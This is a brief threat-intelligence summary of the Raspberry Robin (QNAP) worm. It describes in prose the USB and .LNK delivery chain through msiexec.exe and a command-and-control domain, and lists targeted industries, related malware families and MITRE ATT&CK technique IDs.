Raspberry Robin, also known as the QNAP worm, is typically delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file. Once the user clicks on the .LNK file, it spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility, to download and execute an MSI installer from a command and control (C2) domain
INDUSTRIES: Transportation, Manufacturing, Oil And Gas
MALWARE FAMILIES: Dridex, Raspberry Robin
ATT&CK IDS: T1056 - Input Capture, T1140 - Deobfuscate/Decode Files or Information, T1199 - Trusted Relationship, T1106 - Native API, T1218 - Signed Binary Proxy Execution, T1547 - Boot or Logon Autostart Execution, T1027 - Obfuscated Files or Information, TA0011 - Command and Control
Read More:
コメント